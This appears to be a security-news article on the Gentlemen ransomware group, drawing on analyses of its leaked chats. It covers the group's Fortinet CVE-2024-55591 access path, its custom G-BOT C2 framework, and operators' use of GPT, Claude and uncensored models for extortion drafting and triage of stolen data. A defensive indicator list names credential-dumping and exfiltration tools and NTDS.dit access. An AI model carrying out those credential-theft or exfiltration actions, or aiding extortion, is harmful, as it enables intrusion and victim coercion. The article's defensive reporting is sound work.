The Gentlemen Ransomware Group Uses Fortinet Exploits, AI Tools, and Custom C2 to Scale Attacks
9 min. read 
Published on
The Gentlemen has become one of the most active ransomware operations of 2026, using Fortinet exploits, stolen credentials, custom command-and-control tooling, and AI-assisted workflows to attack enterprise networks.
The group emerged in 2025 and quickly scaled into a major ransomware-as-a-service operation. Halcyon said more than 200 of its victim claims came between January and March 2026, placing it second only to Qilin by volume during that period.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
A major leak of internal communications has now given defenders a rare view into how the group operates. The Ransom-ISAC analysis reviewed 3,366 Rocket.Chat messages, 22 chat rooms, 66 confirmed victims, custom tooling, Fortinet exploitation, and AI-assisted operations.
A fast-growing ransomware operation
The Gentlemen follows a familiar ransomware model. Affiliates break into networks, steal data, encrypt systems, and pressure victims through a leak site. The group also appears to avoid targets in Russia and other CIS countries, a common pattern among Russian-speaking ransomware crews.
Researchers say the operation grew quickly because it offered affiliates a generous revenue split, a multi-platform locker, and access to shared tooling. The group also appears to have attracted people with previous ransomware experience.
Check Point Research said the leaked data exposed nine accounts and included details about infrastructure, affiliate roles, exploit paths, backend systems, and victim operations. The material also showed discussion of Fortinet, Cisco, NTLM relay issues, OWA, and Microsoft 365 credential logs.
| Area | What researchers reported |
|---|---|
| Group name | The Gentlemen |
| Model | Ransomware-as-a-service |
| Language profile | Russian-speaking operator communications |
| Key access focus | Fortinet edge devices, credentials, VPN access, and public-facing services |
| Custom tooling | G-BOT C2, Linux and Windows beacons, SOCKS5 proxying, and builder features |
| AI use | Negotiation drafting, language support, branding, and stolen-data triage discussions |
Fortinet remains a key entry point
The leaked chats show repeated attention to Fortinet appliances. The most important vulnerability mentioned is CVE-2024-55591, a FortiOS and FortiProxy authentication bypass issue.
The official Fortinet advisory says the flaw can allow a remote attacker to gain super-admin privileges through crafted requests to the Node.js WebSocket module or crafted CSF proxy requests. Fortinet also noted reports of exploitation in the wild.
Ransom-ISAC described CVE-2024-55591 as the group’s primary initial access vector in the reviewed leak. The same report said operators also discussed CVE-2025-32433, CVE-2025-33073, Citrix NetScaler issues, and other enterprise-facing weaknesses.
Custom G-BOT tooling makes detection harder
The Gentlemen does not rely only on widely known tools. Its leaked materials show a custom command-and-control framework called G-BOT, which gives operators a web-based control panel for managing infected systems.
The Ransom-ISAC report said G-BOT supports beacon management, command execution, Linux and Windows beacons, SOCKS5 proxying, and builder options that can upload payloads to temporary file-sharing services.
This matters because many security teams tune detections around common frameworks such as Cobalt Strike, Sliver, or commercial remote management tools. A custom C2 framework reduces the value of simple signature-based defenses and forces teams to focus on behavior.
| Capability | Defensive significance |
|---|---|
| Per-beacon command execution | Can support hands-on-keyboard activity after initial access |
| SOCKS5 tunneling | Can help operators pivot inside victim networks |
| Linux and Windows beacons | Expands coverage across mixed enterprise environments |
| Temporary file upload support | Can help stage payloads outside traditional attacker infrastructure |
| Custom panel interface | Can bypass detections focused only on known C2 platforms |
AI now supports ransomware operations
The Gentlemen leak also shows how ransomware operators are adding AI tools to their workflow. This does not mean AI runs the attacks by itself. It means operators use AI to make parts of the criminal business faster.
Ransom-ISAC reported references to GPT and Claude for negotiation text. Operators also discussed rented GPU capacity and uncensored models for triaging stolen data at scale.
That pattern matters for incident responders. Ransomware groups can use AI to write more polished victim messages, translate communications, sort stolen files faster, and identify data that increases extortion pressure.
- AI can improve ransom negotiation drafts and victim-facing messages.
- Translation tools can help operators target companies in more countries.
- Local or uncensored models can reduce reliance on monitored commercial AI services.
- GPU rental can support faster review of large stolen datasets.
Old weaknesses still drive new attacks
The group’s tooling has evolved, but the underlying security gaps remain familiar. Vectra AI compared leaks from Conti, Black Basta, LockBit, and The Gentlemen and concluded that ransomware operators changed their staffing, marketing, and tooling while continuing to exploit the same defensive gaps.
The report also highlighted a link between The Gentlemen and earlier ransomware ecosystems. A negotiator using the handle Tinker appeared in both Black Basta and The Gentlemen material, reinforcing the idea that operators often move between brands rather than leaving the ecosystem.
This explains why taking down one ransomware brand rarely ends the threat. Affiliates, negotiators, access brokers, and developers can carry methods, contacts, and infrastructure habits into the next operation.
Credential theft and data exfiltration remain central
After gaining access, The Gentlemen operators focus heavily on credentials. The leaked material references tools used to harvest browser passwords, VPN credentials, wallets, and other saved secrets.
Group-IB said The Gentlemen relies on repeatable tactics such as Fortinet exploitation, brute-forced VPN access, credential abuse, defense evasion, and rapid ransomware deployment. These are not exotic techniques, but they work when organizations leave edge systems exposed or credentials poorly protected.
Defenders should treat credential dumping, access to NTDS.dit, abnormal VSS backup activity, and unexpected use of file transfer tools as urgent alerts. Waiting for encryption to begin gives attackers too much time to complete data theft and staging.
Indicators defenders should prioritize
Security teams should not rely only on static indicators. The group can change filenames, infrastructure, and tools. However, several patterns from the leaked materials can guide hunting and detection.
| Indicator type | What to monitor | Why it matters |
|---|---|---|
| CVE | CVE-2024-55591 exposure on FortiOS or FortiProxy | Reported as a key Fortinet access path in the leak |
| File pattern | README-GENTLEMEN.txt | Ransom note pattern linked to The Gentlemen locker activity |
| Extension | .i8p14s | Encrypted file extension reported in Linux and NAS locker activity |
| Path | /opt/updateamd | Linux and NAS locker binary path cited in the leak analysis |
| Tooling | rclone, MEGAcmd, WinSCP, Velociraptor, browser credential dumpers | Can indicate staging, exfiltration, remote control, or credential theft |
| Behavior | Mass file rename, unusual VPN login success, suspicious LDAP access | Can reveal intrusion activity before full encryption |
What organizations should do now
The fastest risk reduction starts at the edge. Organizations running Fortinet appliances should verify patch status, review exposed management interfaces, rotate local admin passwords, and inspect VPN accounts for weak or reused credentials.
The Fortinet PSIRT page should guide patching for CVE-2024-55591. Teams should also audit configuration backups because exported FortiGate configurations can expose LDAP bind credentials and other sensitive details.
Identity monitoring also needs more urgency. The Gentlemen’s workflow shows that attackers can move from edge access to credential collection, lateral movement, data theft, and encryption without needing a novel exploit at every step.
- Patch internet-facing appliances quickly, especially Fortinet, Citrix, Cisco, F5, SonicWall, and Palo Alto systems.
- Disable external management access unless administrators need it through a secured path.
- Rotate VPN, local admin, LDAP bind, and service account credentials after suspected exposure.
- Alert on NTDS.dit access, VSS abuse, unusual backup access, and suspicious domain controller enumeration.
- Hunt for unexpected use of rclone, MEGAcmd, WinSCP, Velociraptor, and credential dumping tools.
- Monitor mass file renames and rapid changes on NAS, Linux, VMware, and Windows systems.
The larger lesson for defenders
The Gentlemen represents a newer ransomware brand, but its success comes from familiar weaknesses: unpatched edge devices, exposed VPNs, weak credentials, incomplete monitoring, and delayed response to internal movement.
Vectra AI described this pattern clearly across multiple ransomware leaks. Tooling changes, but the gaps that let attackers enter, move, and steal often remain unchanged for years.
The latest research should push organizations to focus less on the ransomware brand name and more on attack behaviors. The group name may change, but Fortinet exploitation, VPN abuse, credential theft, data staging, and remote tool misuse still provide defenders with practical detection points.
Check Point Research also shows how affiliate programs can scale quickly when experienced operators, shared tooling, and profit incentives align. That makes prevention, credential hygiene, and early detection more important than waiting for a specific ransomware payload to appear.
The most useful takeaway is simple. The Gentlemen’s rise does not require defenders to solve an entirely new class of attack. It requires them to close old gaps faster, watch edge devices more closely, and treat credential theft as the start of a ransomware incident, not a minor alert.
As Group-IB’s TTP analysis shows, the group benefits from repeatable intrusion patterns. Organizations that harden remote access, remove exposed services, monitor credential abuse, and respond early can reduce the group’s easiest paths into the network.
FAQ
The Gentlemen is a ransomware-as-a-service operation that emerged in 2025 and became one of the most active ransomware groups in 2026. It steals data, encrypts systems, and pressures victims through double extortion.
Researchers say the group scaled quickly, attracted affiliates, used a custom C2 framework, exploited Fortinet systems, and added AI-assisted workflows for negotiations and data review.
The main Fortinet issue discussed in the leaked material is CVE-2024-55591, an authentication bypass vulnerability affecting FortiOS and FortiProxy that can allow remote attackers to gain super-admin privileges.
G-BOT is a custom command-and-control framework linked to The Gentlemen. Researchers say it supports beacon management, command execution, SOCKS5 proxying, and builder features for Linux and Windows beacons.
The leaked chats suggest operators used or discussed AI for negotiation drafting, translation, branding, and triaging stolen data. The reports do not show AI autonomously carrying out intrusions.
Organizations should patch exposed edge devices, especially Fortinet systems, rotate credentials, restrict VPN access, monitor for credential dumping, alert on NTDS.dit and VSS activity, and hunt for unusual tools such as rclone, MEGAcmd, WinSCP, and Velociraptor.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages